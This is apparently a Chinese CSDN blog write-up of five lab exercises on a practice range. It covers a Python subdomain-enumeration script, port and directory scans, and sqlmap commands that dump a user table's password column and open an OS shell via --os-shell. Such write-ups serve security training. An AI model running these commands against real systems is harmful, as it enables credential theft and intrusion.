旧靶场 - Kali系列【5题】

最新推荐文章于 2024-05-13 11:57:26 发布
最新推荐文章于 2024-05-13 11:57:26 发布
阅读量2.2k 收藏 2
点赞数 2
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120992772
版权

旧靶场 - Kali系列【5题】

信息搜集之: 子域名探测

flag在http://shop.aqlab.cn

import requests

with open('D:/zuomian/ctf shiyan/dict.txt') as f:
    for i in f:
        ii=i.replace('\n','')
        url = 'http://'+ii+'.aqlab.cn'
        try:
            data = requests.get(url)
            print(url)
        except requests.exceptions.ConnectionError:
            requests.status_code = "Connection refused"

http://www.aqlab.cn
http://pass2.aqlab.cn
http://shop.aqlab.cn
http://service.aqlab.cn

Process finished with exit code 0

在这里插入图片描述

信息搜集:端口扫描

flag:8001,上面有显示

漏洞扫描 - web扫描器

用御剑扫/,得到flag
在这里插入图片描述

注入测试-sqlmap

查库
python sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --batch --dbs

查cake的表
python sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --batch -D cake --tables
在这里插入图片描述查user的字段
python sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --batch -D cake -T user --columns
在这里插入图片描述
查字段内容
python sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --batch -D cake -T user -C passwd --dump
在这里插入图片描述

Sqlmap --os-shell

得到shell
python sqlmap.py -u http://shop.aqlab.cn:8001/single.php?id=1 --batch --os-shell
在这里插入图片描述type查看文件内容
在这里插入图片描述

F。N 嘿嘿
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali渗透练习DC:2
qq_50905066的博客
03-24 2911
与dc1相同我们先要下载靶机,配置靶机网卡为nat,打开靶机。启动Kali使用Namp扫描。 扫描完成后排除过大与过小的和本机的地址很容易得到靶机地址。得到地址后扫描靶机开启的端口与服务。 得到信息,靶机开启了80端口http服务,7744端口ssh服务。浏览器查看靶机http服务 发现无法链接,找不到dc-2的ip 地址,这是由于本机的dns服务无法解析地址。语言手动添加 这里是windows的路由添加。添加之后我们刷新dns 以后再次尝试浏览 成功打开,再打开的...
Hack-nos-1的一次靶场实战练习
m0_58153689的博客
08-26 195
靶机 靶场
运维最新【kali-Linux】DVWA搭建漏洞靶场_kali搭建dvwa靶场(4),2024年最新面试字节跳动Linux运维工程师该怎么准备
最新发布
2301_76225520的博客
05-13 930
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
KalisqlmapConnection timed out to the target URL. unable to connect to the target URL
qq_53706360的博客
05-07 3219
Kalisqlmap,扫描Windows主机上部署的sqli-labs 出现上面情况解决方法; 1.在kali界面用浏览器访问测试:http://Windows虚拟网卡的IP地址/sqli-labs的目录,即Kali下访问sqli-labs,不能再用域名,因为域名是在物理机本地上设置的,Kali主机的DNS并不能够解析这个域名 2、第一步如果可以打开sqli-labs的页面,再用sqlmap扫,如果不能,检查IP是不是弄错了。首先用Kali去PingWindows虚拟网卡的IP地址,Ping不..
【积累报错信息】
today119的博客
12-21 304
关于报错的积累积累报错信息以往一些报错信息 积累报错信息 这是第一次编写错误信息,也是积累的开始,同时也是方便自己回忆。 以往一些报错信息 1.报错信息:The requested resource is not available 原因:因为没有在controller 加@ResponseBody 2.报错信息:Error running ‘a ngelwing’: Unable to open debugger port (127.0.0.1:59589): java.net.SocketExcepti
Kalisqlmap :[10:39:37] [CRITICAL] unable to connect to the target URL
二十四桥明月夜
04-17 4525
1、kali中使用sqlamp 访问靶机OWAS中页面进行SQL注入提示:unable to connect to the target URL 2、看了网上的都是扯淡增加代理访问 sqlmap -u "http://192.168.111.132/mutillidae/index.php?page=user-info.php&username=zhuzhu&password=123456&user-info-php-submit-button=View+Account+Det
linux-headers-5.10.0-kali7-amd64_5.10.28-1kali1_amd64.deb
07-25
kali安装后,安装虚拟机tools需要的linux头文件
minidwep-gtk-kali_40420_amd64.deb
05-22
本工具(水滴minidwep-gtk)仅仅只用于个人无线网络渗透测试,严禁其他任何用途!!
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
daxueba-kali-linux-tutorial.zip
03-01
daxueba-kali-linux-tutorial pdf资源
penetration-testing-with-kali.pdf
08-10
"Kali Linux 渗透测试" Kali Linux 是一种基于 Debian 的 Linux 发行版,专门为数字 forensics 和渗透测试而设计。它提供了大量的渗透测试工具和实用程序,以帮助安全专业人员执行渗透测试和漏洞评估。 渗透测试是...
Sqlmap 渗透注入总是显示无法连接目标网络问分析与解决
热门推荐
Specif1c的博客
08-04 1万+
如下: [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s) 分析与解决: 1、在 sqlmap 安装目录下(/usr/share/sqlmap/)启动 sqlmap。 2、看注入的目标地址是不是 https 协议,如果是可以使用sqlmap直接加上–force-ssl参数,告诉sqlmap这是https服务。或者可以在Host头后面加上:443(默认不是443)。 3、ip
【期末复习】Linux(kali)实验部分
Selma003的博客
05-22 2453
Linux(kali)期末实验复习~
【MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 900
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
2022年全国职业技能大赛网络安全竞赛试B模块自己解析思路(1)
路漫漫其修远兮
04-14 5502
2022年全国职业技能大赛网络安全竞赛试B模块自己解析思路(1)
kalilinux渗透教程实战,java面试笔试大全带答案
m0_61409092的博客
02-29 726
事务A、B交替执行,事务A被事务B干扰到了,因为事务A读取到事务B未提交的数据,这就是脏读在一个事务范围内,两个相同的查询,读取同一条记录,却返回了不同的数据,这就是不可重复读。事务A查询一个范围的结果集,另一个并发事务B往这个范围中插入/删除了数据,并静悄悄地提交,然后事务A再次查询相同的范围,两次读取得到的结果集不一样了,这就是幻读。对于面试,一定要有良好的心态,这位小伙伴面试美团的时候没有被前面阿里的面试影响到,发挥也很正常,也就能顺利拿下美团的offer。
要想学会Kali linux事先需要掌握哪些知识?
weixin_34216036的博客
11-05 4945
算起来在linux上开发程序差不多有十几年的时间了,接触linux是从一本杂志上看到的,说到了linux系统如何的高效安全,于是在千方百计的搞了个linux系统盘,然后安装起来了,切换到命令行界面,然后用C语言编程写了个hello world程序,还洋洋得意了好几天,结果好景不长,在倒腾linux系统的时候,把之前windows盘的数据给破坏了,那份兴奋...
Python的练习(初学百练)100+
kali_yao的博客
09-13 1645
此文的脚本是根据 《《python基础》》_kali_yao的博客-CSDN博客Python进阶_kali_yao的博客-CSDN博客安装python 的包控制mysql的Python脚本与执行系统命令的Python脚本_kali_yao的博客-CSDN博客Python 的电子邮件编程_kali_yao的博客-CSDN博客 所写的示例 print("小明", '喜欢', 'Python', sep=' ') print(1, 2, 3, 4) print(1, 2, 3, 4, sep='.
awvs-kali-15.3
04-30
AWVS-Kali-15.3是指Acunetix Web Vulnerability Scanner(AWVS)在Kali Linux 15.3版本上的安装和使用。AWVS是一款常用的Web应用程序漏洞扫描工具,用于检测和识别Web应用程序中的安全漏洞。 在Kali Linux 15.3上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值